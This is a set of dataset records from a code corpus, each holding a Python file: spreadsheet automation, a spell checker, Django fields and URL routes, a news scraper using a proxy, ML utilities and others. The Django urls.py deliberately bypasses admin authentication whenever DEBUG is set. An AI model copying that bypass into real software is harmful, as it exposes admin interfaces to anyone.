function\r\n def mfill(worksheet_name):\r\n ws = worksheet_name\r\n r = 2 \r\n #iterates through rows and adds formula\r\n #Match Type\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if '+' in ws.cell(row=r, column=3).value:\r\n ws.cell(row=r, column=4).value = 'Broad'\r\n else:\r\n ws.cell(row=r, column=4).value = 'Exact'\r\n if ws.cell(row=r, column=4).value =='Broad':\r\n ws.cell(row=r, column=5).value = 10\r\n else:\r\n ws.cell(row=r, column=5).value = 12\r\n if any(word in ws.cell(row=r, column=3).value for word in info[1]):\r\n ws.cell(row=r, column=8).value = 'BN'\r\n else:\r\n ws.cell(row=r, column=8).value = 'UB'\r\n r += 1\r\n \r\n \r\n mfill(wb[\"Awareness\"])\r\n mfill(wb[\"Interest\"])\r\n mfill(wb[\"Consideration\"])\r\n mfill(wb[\"Evaluation\"])\r\n\r\n #URL fill function\r\n def ufill(worksheet_name,url_asset_G,url_asset_B):\r\n ws = worksheet_name\r\n r = 2\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n ws.cell(row=r, column=6).value = str(url_asset_G)\r\n ws.cell(row=r, column=7).value = str(url_asset_B)\r\n r += 1\r\n \r\n ufill(wb[\"Awareness\"],urls[0], urls[1])\r\n ufill(wb[\"Interest\"],urls[2], urls[3])\r\n ufill(wb[\"Consideration\"],urls[4], urls[5])\r\n ufill(wb[\"Evaluation\"],urls[6],urls[7])\r\n\r\n def afill(worksheet_name):\r\n r = 2\r\n ws = worksheet_name\r\n if ws == wb[\"Awareness\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[4]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[5]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[6]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[7]\r\n if ws == wb[\"Interest\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[8]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[9]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[10]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[11]\r\n if ws == wb[\"Consideration\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[12]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[13]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[14]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[15]\r\n if ws == wb[\"Evaluation\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[16]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[17]\r\n elif 
ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[18]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[19]\r\n\r\n\r\n afill(wb[\"Awareness\"])\r\n afill(wb[\"Interest\"])\r\n afill(wb[\"Consideration\"])\r\n afill(wb[\"Evaluation\"])\r\n\r\n def cfill(worksheet_name):\r\n ws = worksheet_name\r\n r = 2\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=1).value = taxonomy[0]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=1).value = taxonomy[1]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=1).value = taxonomy[2]\r\n else:\r\n ws.cell(row=r, column=1).value = taxonomy[3]\r\n r +=1\r\n\r\n cfill(wb[\"Awareness\"])\r\n cfill(wb[\"Interest\"])\r\n cfill(wb[\"Consideration\"])\r\n cfill(wb[\"Evaluation\"])\r\n\r\n #Export to Excell\r\n wb.save(filename=\"Build Out.xlsx\")\r\n \r\n if radio == 2:\r\n ws1 = ws.title = \"Build\"\r\n #keyword fill function\r\n def kfill(worksheet_name):\r\n ws = worksheet_name \r\n r=2\r\n for word in info[0]:\r\n ws.cell(row=r, column=3).value = word\r\n r+=1\r\n #fill keyword sett to column\r\n kfill(wb[\"Build\"])\r\n\r\n def column_title(worksheet_name):\r\n for ws in wb:\r\n ws['A1'] = 'Campaign'\r\n ws['B1'] = 'Ad Group'\r\n ws['C1'] = 'Keyword'\r\n ws['D1'] = 'Match Type'\r\n ws['E1'] = 'Max CPC'\r\n ws['F1'] = 'Final URL Google'\r\n ws['G1'] = 'Final URL Bing'\r\n ws['H1'] = 'BN/UB'\r\n\r\n #name each column\r\n column_title(wb[\"Build\"])\r\n\r\n \r\n \r\n\r\n \r\n\r\nbutton1 = tk.Button(text='Create Build', command=createBuild, anchor ='w')\r\nbutton1.pack()\r\n\r\nroot.mainloop()","sub_path":"Build_Out_V4.py","file_name":"Build_Out_V4.py","file_ext":"py","file_size_in_byte":23152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301849309","text":"import os.path as osp\nimport sys\nfrom typing import Callable, List, Optional, Sequence\n\nimport numpy as np\n\nfrom hunspell import HunSpell\nfrom textdistance import levenshtein, jaro_winkler, needleman_wunsch\n\n\nclass SpellChecker:\n def __init__(\n self,\n dict_path: str = './dictionaries/en',\n num_suggestions: int = 5,\n distances: Optional[Sequence[Callable[[str, str], float]]] = None\n ) -> None:\n self._hunspell = HunSpell(\n osp.join(dict_path, 'index.dic'), osp.join(dict_path, 'index.aff')\n )\n self._num_suggestions = num_suggestions\n self._distances = distances or [\n levenshtein.normalized_distance,\n jaro_winkler.normalized_distance,\n needleman_wunsch.normalized_distance\n ]\n\n def _compute_distances(self, word: str, candidates: str) -> List[float]:\n return [sum(d(word, c) for d in self._distances) for c in candidates]\n\n def suggest_if_needed(self, word: str) -> List[str]:\n if self._hunspell.spell(word):\n return []\n candidates = self._hunspell.suggest(word)\n distances = self._compute_distances(word, candidates)\n if self._num_suggestions < len(candidates):\n topk_idx = np.argpartition(\n distances, self._num_suggestions\n )[:self._num_suggestions]\n\n candidates = [candidates[i] for i in topk_idx]\n distances = [distances[i] for i in topk_idx]\n\n return [x[1] for x in sorted(zip(distances, candidates))]\n\n\ndef spell_check():\n words = sys.argv[1:]\n 
spell_checker = SpellChecker()\n\n for word in words:\n suggestions = spell_checker.suggest_if_needed(word)\n if len(suggestions) != 0:\n print(word.ljust(max(map(len, words))), '| Suggestions:', suggestions)\n else:\n print(\n word.ljust(max(map(len, words))),\n '| The word is correct or nothing to suggest!'\n )\n","sub_path":"spell_checker.py","file_name":"spell_checker.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"119835759","text":"import os\nfrom django.db.models import FileField\nfrom django.forms import forms\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.translation import ugettext_lazy as _\n\nclass AudioField(FileField):\n \"\"\"\n Same as FileField, but you can specify:\n * content_types - list containing allowed content_types. Example: ['application/pdf', 'image/jpeg']\n * max_upload_size - a number indicating the maximum file size allowed for upload.\n 2.5MB - 2621440\n 5MB - 5242880\n 10MB - 10485760\n 20MB - 20971520\n 50MB - 52428800\n 100MB - 104857600\n 250MB - 262144000\n 500MB - 524288000\n \"\"\"\n def __init__(self, *args, **kwargs):\n FileField.__init__(self)\n self.content_types = '' #kwargs.pop(\"content_types\")\n self.max_upload_size = 20971520 #kwargs.pop(\"max_upload_size\")\n super(AudioField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs): \n data = super(AudioField, self).clean(*args, **kwargs)\n if data is None:\n if self.required:\n raise forms.ValidationError(\"This File is required\")\n else:\n return\n else:\n file = data.file\n try:\n content_type = file.content_type\n if content_type.split('/')[0]=='audio':\n if file._size > self.max_upload_size:\n raise forms.ValidationError(_('Please keep filesize under %s. 
Current filesize %s') % (filesizeformat(self.max_upload_size), filesizeformat(file._size)))\n else:\n raise forms.ValidationError(_('Filetype not supported.'))\n except AttributeError:\n pass \n return data\n\n\nclass ExtFileField(forms.FileField):\n \"\"\"\n Same as forms.FileField, but you can specify a file extension whitelist.\n\n >>> from django.core.files.uploadedfile import SimpleUploadedFile\n >>>\n >>> t = ExtFileField(ext_whitelist=(\".pdf\", \".txt\"))\n >>>\n >>> t.clean(SimpleUploadedFile('filename.pdf', 'Some File Content'))\n >>> t.clean(SimpleUploadedFile('filename.txt', 'Some File Content'))\n >>>\n >>> t.clean(SimpleUploadedFile('filename.exe', 'Some File Content'))\n Traceback (most recent call last):\n ...\n ValidationError: [u'Not allowed filetype!']\n \"\"\"\n def __init__(self, *args, **kwargs):\n ext_whitelist = kwargs.pop(\"ext_whitelist\")\n self.ext_whitelist = [i.lower() for i in ext_whitelist]\n\n super(ExtFileField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs):\n data = super(ExtFileField, self).clean(*args, **kwargs)\n if data is None:\n if self.required:\n raise forms.ValidationError(\"This File is required\")\n else:\n return\n else:\n filename = data.name\n ext = os.path.splitext(filename)[1]\n ext = ext.lower()\n if ext not in self.ext_whitelist:\n raise forms.ValidationError(\"Not allowed filetype!\")\n\n#-------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n import doctest, datetime\n doctest.testmod()\n","sub_path":"being/myfields.py","file_name":"myfields.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522791263","text":"# reverse a string\nno_of_chars = 256\n\n \ndef reverse(string):\n left = 0 \n right = len(string) - 1\n\n string = list(string)\n\n\n while left < right:\n#swap\n temp = string[left]\n string[left] = string[right]\n string[right] = temp\n\n left+=1\n right-=1\n \n temp1 = ''\n for x in range(len(string)):\n temp1 += string[x]\n\n print(temp1)\n\n\n \n \n\n# Driver code \nif __name__ == \"__main__\": \n\n string = \"nivrutti\"\n\n reverse(string)\n \n\n\n'''\nSudiptos approach\n\n\nTime complexity = O(n)\n\nSpace Compelxity = O(n)\n\n\n\n\none line code ==> string[::-1]\n\n\n'''","sub_path":"mycodes/strings/p4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567631661","text":"from django.test import LiveServerTestCase\nimport sys\nfrom selenium import webdriver\n\nurls = {\n \"local\": \"http://localhost:8000/\",\n \"prod\": \"http://ec2-52-90-175-114.compute-1.amazonaws.com/\"\n}\n\n\nclass HomePageTest(LiveServerTestCase):\n @classmethod\n def setUpClass(cls):\n for arg in sys.argv:\n if 'liveserver' in arg:\n env = arg.split(\"=\")[1]\n if env in urls:\n cls.server_url = urls[env]\n print(\"Running functional tests for {0} on {1}\".format(env, cls.server_url))\n return\n else:\n print(\"Unknown environment {0}, using local instead.\".format(env))\n break\n super().setUpClass()\n cls.server_url = urls[\"local\"]\n\n @classmethod\n def tearDownClass(cls):\n if cls.server_url == urls[\"local\"]:\n super().tearDownClass()\n\n def setUp(self):\n self.browser = webdriver.Chrome()\n\n def test_home_page_shows_map(self):\n self.browser.get(self.server_url)\n self.assertIn(\"Azume\", self.browser.title)\n 
self.assertTrue(self.browser.find_element_by_class_name(\"gm-style\"), \"Google maps not found.\")\n self.browser.quit()\n\n","sub_path":"src/web/azume/functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154870833","text":"import json\nimport os\n\nimport h5py\nimport pandas as pd\n\nfrom config import MSVDSplitConfig as C\n\n\ndef load_metadata():\n df = pd.read_csv(C.caption_fpath)\n df = df[df['Language'] == 'English']\n df = df[pd.notnull(df['Description'])]\n df = df.reset_index(drop=True)\n return df\n\n\ndef load_videos():\n f = h5py.File(C.video_fpath, 'r')\n return f\n\n\ndef load_splits():\n with open('data/MSVD/metadata/train.list', 'r') as fin:\n train_vids = json.load(fin)\n with open('data/MSVD/metadata/valid.list', 'r') as fin:\n val_vids = json.load(fin)\n with open('data/MSVD/metadata/test.list', 'r') as fin:\n test_vids = json.load(fin)\n return train_vids, val_vids, test_vids\n\n\ndef save_video(fpath, vids, videos):\n fout = h5py.File(fpath, 'w')\n for vid in vids:\n fout[vid] = videos[vid].value\n fout.close()\n print(\"Saved {}\".format(fpath))\n\n\ndef save_metadata(fpath, vids, metadata_df):\n vid_indices = [ i for i, r in metadata_df.iterrows() if \"{}_{}_{}\".format(r[0], r[1], r[2]) in vids ]\n df = metadata_df.iloc[vid_indices]\n df.to_csv(fpath)\n print(\"Saved {}\".format(fpath))\n\n\ndef split():\n videos = load_videos()\n metadata = load_metadata()\n\n train_vids, val_vids, test_vids = load_splits()\n\n save_video(C.train_video_fpath, train_vids, videos)\n save_video(C.val_video_fpath, val_vids, videos)\n save_video(C.test_video_fpath, test_vids, videos)\n\n save_metadata(C.train_metadata_fpath, train_vids, metadata)\n save_metadata(C.val_metadata_fpath, val_vids, metadata)\n save_metadata(C.test_metadata_fpath, test_vids, metadata)\n\n\nif __name__ == \"__main__\":\n split()\n\n","sub_path":"torchOnVideo/cleanup/splits/MSVD.py","file_name":"MSVD.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388489546","text":"import test_pb2 as p\n\ndef handler(conn, event):\n try:\n d = p.MyDict()\n d.turn = \"pow\"\n d.pow = \"scram\"\n obj = d.SerializeToString()\n\n e = p.MyDict()\n e.ParseFromString(obj)\n return \"Recoverd obj. 
Turn: \" + e.turn\n except Exception as e:\n return {'error': str(e)} \n","sub_path":"mm_lambdas/proto_test/lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"50714089","text":"def conv_groups_fn(params):\n return [param.view(param.shape[:2] + (-1,)).transpose(2, 1) for param in params]\n\ndef column_groups_fn(params):\n return [param.unsqueeze(0) for param in params]\n\ndef resnet_groups(model, args):\n to_prox_conv, to_prox_linear = [], []\n remaining = []\n\n for name, param in model.named_parameters():\n if 'weight' in name:\n if param.ndim == 4:\n to_prox_conv.append(param)\n elif param.ndim == 2:\n to_prox_linear.append(param)\n else:\n remaining.append(param) # BN weight\n else:\n remaining.append(param)\n\n optimizer_grouped_parameters = [\n {\n 'params': to_prox_conv,\n 'weight_decay': args.weight_decay,\n 'groups_fn': conv_groups_fn\n },\n {\n 'params': to_prox_linear,\n 'weight_decay': args.weight_decay,\n 'groups_fn': column_groups_fn\n }\n ]\n if remaining:\n optimizer_grouped_parameters.append({\n 'params': remaining,\n 'weight_decay': args.weight_decay,\n 'groups_fn': None\n })\n\n return optimizer_grouped_parameters\n","sub_path":"proxssi/groups/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614827487","text":"import argparse\nimport json\nimport os\nimport sys\n\n\ndef read_file_skip_header_lazy(file):\n with open(file, \"r\") as f:\n next(f)\n for line in f.readlines():\n yield line\n\n\ndef _read_actual_file(actual_file):\n actual_items = {}\n for line in read_file_skip_header_lazy(actual_file):\n url, logo_url = line.split(\",\")\n url, logo_url = url.strip().strip(\"/\"), logo_url.strip().strip(\"/\")\n if not actual_items.get(url):\n actual_items[url] = logo_url\n return actual_items\n\n\ndef _read_json_file(json_file):\n predicted_items = {}\n with open(json_file) as f:\n data = json.load(f)\n for line in data:\n url, logo_url = line['webpage_url'].strip().strip(\"/\"), line['logo_url'].strip().strip(\"/\")\n if not predicted_items.get(url):\n predicted_items[url] = logo_url\n return predicted_items\n\n\ndef compare(actual_file, json_file):\n actual_items = _read_actual_file(actual_file)\n predicted_items = _read_json_file(json_file)\n\n result = {\n 'Equal': [],\n 'Not Equal': [],\n 'Not Found': [],\n }\n\n for url, logo_url in actual_items.items():\n predicted_logo_url = predicted_items.get(url)\n if predicted_logo_url == logo_url:\n result['Equal'].append(url)\n elif not predicted_logo_url:\n result['Not Found'].append(url)\n else:\n result['Not Equal'].append(url)\n\n for key, items in result.items():\n print(\"-\" * 124)\n print(\"| {} | {} |\\n\".format(key, len(items)))\n for item in items:\n print(\"| {:<120} |\".format(item))\n print(\"-\" * 124)\n print()\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Checker for actual vs scraped logo url\")\n parser.add_argument(\"-actual\", help=\"Location of actual txt file\", required=True)\n parser.add_argument(\"-json\", help=\"Location of JSON file\", required=True)\n args = parser.parse_args()\n\n def file_abs_path(file_name):\n return os.path.join(os.path.dirname(os.path.realpath('__file__')), file_name)\n\n actual_file = file_abs_path(args.actual)\n if not os.path.isfile(actual_file):\n print(\"Provide the correct actual 
file.\")\n sys.exit()\n\n json_file = file_abs_path(args.json)\n if not os.path.isfile(json_file):\n print(\"Provide the correct JSON file.\")\n sys.exit()\n\n compare(actual_file, json_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159790682","text":"from pcfg import PCFG\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--corpus\", help=\"training treebank corpus\", type=str)\nparser.add_argument(\"--sentences\", help=\"raw token sentences\", type=str)\nparser.add_argument(\"--outfile\", help=\"name of the output file\", type=str)\nargs = parser.parse_args()\n\ngrammar = PCFG(args.corpus)\ngrammar.parse_corpus()\ngrammar.predict(args.sentences, args.outfile)\n","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115219732","text":"import urllib.request # библиотеки для открытия url\nimport urllib.error # классы исключения библиотеки urllib.request\nfrom datetime import date # библиотека даты и времени\nimport re # библиотека регулярных выражений\nimport csv # библиотека записи csv-файлах\n\n\nurl = 'https://www.zakon.kz/news' # веб-страница парсинга\nproxy = {'https': 'https://185.212.128.43:3128'} # свободный прокси\n\n# через бесконечный цикл запрос проходит через свободный прокси с обработкой исключений\nwhile True:\n try:\n proxy_support = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxy_support)\n urllib.request.install_opener(opener)\n req = urllib.request.Request(url)\n resp = urllib.request.urlopen(req)\n except urllib.error.HTTPError:\n continue\n except urllib.error.URLError:\n continue\n break\n\n\nrespData = resp.read() # html-текст веб-страницы\nrespData = respData.decode(\"utf-8\") # байтовый тип конвертируем в string\n# comment_nums = re.findall(r'(.*?)',str(respData))\nparagraphs = re.findall(r'',str(respData)) # через рег. выражения находим все ссылки\ndates = re.findall(r')',str(respData)) # через рег. 
выражения находим все времена\n# сохраняем в массив времена из dates\npubDates = []\nfor i in dates:\n if i.__contains__('n3'):\n pubDates.append(str(re.split(\">|<\",i)[1]))\n\niter = 0 # итерируемая переменная для вызова элементов pubDates\nf = open('zakon.csv','w',newline='',encoding=\"utf-8\") # открываем новый файл zakon.csv для записи с кодировкой utf-8\nwriter = csv.writer(f,delimiter=',', # функция записи данных в файл\n quoting=csv.QUOTE_MINIMAL)\nwriter.writerow(['Заголовок','Текст','Дата публикации']) # записываем первую строку - названия столбцов\n\n# проходим через все ссылки\nfor each in paragraphs:\n if each.__contains__(\"html\") and each.__contains__(\"target='_blank\"): # открываем лишь ссылки на новостные страницы\n head = re.split(\"/|>|'\",each)[8] # выбираем заголовок из ссылки\n # link = \"https://www.zakon.kz/\"+re.split(\"/|>|'\",each)[6]\n text = \"\"\n # сохраняем весь текст в переменную text, на каждый запрос переходим через прокси\n while True:\n try:\n proxy_support = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxy_support)\n urllib.request.install_opener(opener)\n curReq = urllib.request.Request(\"https://www.zakon.kz/\"+re.split(\"/|>|'\",each)[6])\n curResp = urllib.request.urlopen(curReq)\n except urllib.error.HTTPError:\n continue\n except urllib.error.URLError:\n continue\n break\n curRespData = curResp.read()\n curRespData = curRespData.decode(\"utf-8\")\n curParagraphs = re.findall('
<p>(.*?)</p>
',str(curRespData)) # находим текст в текстовых абзацах\n # сохраняем каждый текст\n for y in curParagraphs:\n text += re.sub('<[^>]+>','',str(y)) # удаляем все ссылки и теги из текста\n # print(re.sub('<[^>]+>','',str(y)))\n writer.writerow([head,text,str(date.today())+\" \"+pubDates[iter]]) # записываем все получившиеся данные в следующую строку\n iter += 1 # присваиваем +1 для перехода на следующую дату\nf.close() # закрываем файл\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645835723","text":"from mesa import Agent\nfrom agents.import_agents import *\n\nclass WaterAgent(Agent):\n def __init__(self, unique_id, model, specie, agent_type):\n super().__init__(unique_id, model)\n self.type = agent_type\n self.gender = None\n self.specie=specie\n self.health = 100","sub_path":"app/agents/water_agent.py","file_name":"water_agent.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"495582600","text":"from django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic import RedirectView\nfrom rest_framework import permissions\n\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\n\nfrom .views import (\n AboutStats,\n APITokenView,\n CompendiumResultDetails,\n CompendiumResultList,\n ComputationalResultsList,\n ComputedFilesList,\n CreateApiTokenView,\n CreateDatasetView,\n DatasetView,\n DownloaderJobList,\n ExperimentDetail,\n ExperimentDocumentView,\n ExperimentList,\n FailedDownloaderJobStats,\n FailedProcessorJobStats,\n InstitutionList,\n OrganismList,\n OriginalFileList,\n PlatformList,\n ProcessorJobList,\n ProcessorList,\n QNTargetsAvailable,\n QNTargetsDetail,\n SampleDetail,\n SampleList,\n Stats,\n SurveyJobList,\n TranscriptomeIndexDetail,\n TranscriptomeIndexList,\n handle404error,\n handle500error,\n)\n\n\n# This provides _public_ access to the /admin interface!\n# Enabling this by setting DEBUG to true this will allow unauthenticated access to the admin interface.\n# Very useful for debugging (since we have no User accounts), but very dangerous for prod!\nclass AccessUser:\n has_module_perms = has_perm = __getattr__ = lambda s, *a, **kw: True\n\n\nif settings.DEBUG:\n admin.site.has_permission = lambda r: setattr(r, \"user\", AccessUser()) or True\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Refine.bio API\",\n default_version=\"v1\",\n description=\"\"\"\nrefine.bio is a multi-organism collection of genome-wide transcriptome or gene expression data that has been obtained from publicly available repositories and uniformly processed and normalized. 
refine.bio allows biologists, clinicians, and machine learning researchers to search for experiments from different source repositories all in one place and build custom data sets for their questions of interest.\n\nThe swagger-ui view can be found [here](http://api.refine.bio/swagger/).\n\nThe ReDoc view can be found [here](http://api.refine.bio/).\n\nAdditional documentation can be found at [docs.refine.bio](http://docs.refine.bio/en/latest/).\n\n### Questions/Feedback?\n\nIf you have a question or comment, please [file an issue on GitHub](https://github.com/AlexsLemonade/refinebio/issues) or send us an email at [ccdl@alexslemonade.org](mailto:ccdl@alexslemonade.org).\n \"\"\",\n terms_of_service=\"https://www.refine.bio/terms\",\n contact=openapi.Contact(email=\"ccdl@alexslemonade.org\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n url(\n r\"^(?Pv1)/\",\n include(\n [\n # Primary search and filter interface\n url(r\"^search/$\", ExperimentDocumentView.as_view({\"get\": \"list\"}), name=\"search\"),\n url(r\"^experiments/$\", ExperimentList.as_view(), name=\"experiments\"),\n url(\n r\"^experiments/(?P.+)/$\",\n ExperimentDetail.as_view(),\n name=\"experiments_detail\",\n ),\n url(r\"^samples/$\", SampleList.as_view(), name=\"samples\"),\n url(\n r\"^samples/(?P.+)/$\",\n SampleDetail.as_view(),\n name=\"samples_detail\",\n ),\n url(r\"^organisms/$\", OrganismList.as_view(), name=\"organisms\"),\n url(r\"^platforms/$\", PlatformList.as_view(), name=\"platforms\"),\n url(r\"^institutions/$\", InstitutionList.as_view(), name=\"institutions\"),\n url(r\"^processors/$\", ProcessorList.as_view(), name=\"processors\"),\n # Deliverables\n url(r\"^dataset/$\", CreateDatasetView.as_view(), name=\"create_dataset\"),\n url(r\"^dataset/(?P[0-9a-f-]+)/$\", DatasetView.as_view(), name=\"dataset\"),\n url(r\"^token/$\", CreateApiTokenView.as_view(), name=\"token\"),\n url(r\"^token/(?P[0-9a-f-]+)/$\", APITokenView.as_view(), name=\"token_id\"),\n # Jobs\n url(r\"^jobs/survey/$\", SurveyJobList.as_view(), name=\"survey_jobs\"),\n url(r\"^jobs/downloader/$\", DownloaderJobList.as_view(), name=\"downloader_jobs\"),\n url(r\"^jobs/processor/$\", ProcessorJobList.as_view(), name=\"processor_jobs\"),\n # Dashboard Driver\n url(r\"^stats/$\", Stats.as_view(), name=\"stats\"),\n url(\n r\"^stats/failures/downloader$\",\n FailedDownloaderJobStats.as_view(),\n name=\"stats_failed_downloader\",\n ),\n url(\n r\"^stats/failures/processor$\",\n FailedProcessorJobStats.as_view(),\n name=\"stats_failed_processor\",\n ),\n url(r\"^stats-about/$\", AboutStats.as_view(), name=\"stats_about\"),\n # Transcriptome Indices\n path(\n \"transcriptome_indices/\",\n include(\n [\n path(\n \"\", TranscriptomeIndexList.as_view(), name=\"transcriptome_indices\"\n ),\n path(\n \"\",\n TranscriptomeIndexDetail.as_view(),\n name=\"transcriptome_indices_read\",\n ),\n ]\n ),\n ),\n # QN Targets\n url(r\"^qn_targets/$\", QNTargetsAvailable.as_view(), name=\"qn_targets_available\"),\n url(\n r\"^qn_targets/(?P.+)$\",\n QNTargetsDetail.as_view(),\n name=\"qn_targets\",\n ),\n # Computed Files\n url(r\"^computed_files/$\", ComputedFilesList.as_view(), name=\"computed_files\"),\n url(r\"^original_files/$\", OriginalFileList.as_view(), name=\"original_files\"),\n url(\n r\"^computational_results/$\", ComputationalResultsList.as_view(), name=\"results\"\n ),\n # Compendia\n url(r\"^compendia/$\", CompendiumResultList.as_view(), 
name=\"compendium_results\"),\n url(\n r\"^compendia/(?P[0-9]+)/$\",\n CompendiumResultDetails.as_view(),\n name=\"compendium_result\",\n ),\n # v1 api docs\n url(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema_swagger_ui\",\n ),\n url(r\"^$\", schema_view.with_ui(\"redoc\", cache_timeout=0), name=\"schema_redoc\"),\n ]\n ),\n ),\n # Admin\n url(r\"^admin/\", admin.site.urls),\n # Redirect root urls to latest version api docs\n url(r\"^swagger/$\", RedirectView.as_view(url=\"/v1/swagger\")),\n url(r\"^$\", RedirectView.as_view(url=\"/v1\")),\n]\n\n# handle errors\nhandler404 = handle404error\nhandler500 = handle500error\n","sub_path":"api/data_refinery_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137025690","text":"# coding:utf8\r\n'''\r\nCreated on 2015-02-14\r\n\r\n@author: liliurd\r\n'''\r\n\r\nfrom django.db import models\r\nfrom django.contrib.auth.models import User\r\n# Create your models here.\r\n\r\n\r\nclass UserInfo(models.Model):\r\n mail = models.CharField(unique=True, max_length=128, verbose_name=u'邮箱')\r\n name = models.CharField(db_index=True, null=True, blank=True, max_length=128, verbose_name=u'姓名')\r\n depart = models.CharField(db_index=True, max_length=128, blank=True, null=True, verbose_name=u'部门')\r\n first = models.DateTimeField(auto_now_add=True, verbose_name=u'首次登陆时间')\r\n latest = models.DateTimeField(auto_now=True, verbose_name=u'最新登陆时间')\r\n times = models.IntegerField(default=0, null=True, blank=True, verbose_name=u'登陆次数')\r\n options = models.TextField(blank=True, null=True, verbose_name=u'自定义')\r\n auth = models.IntegerField(db_index=True, default=0)\r\n\r\n class Meta:\r\n verbose_name = u\"用户信息\"\r\n verbose_name_plural = u\"用户信息\"\r\n\r\nclass Authorization(models.Model):\r\n user_id = models.IntegerField(db_index=True, default=0, verbose_name=u'用户id')\r\n work_id = 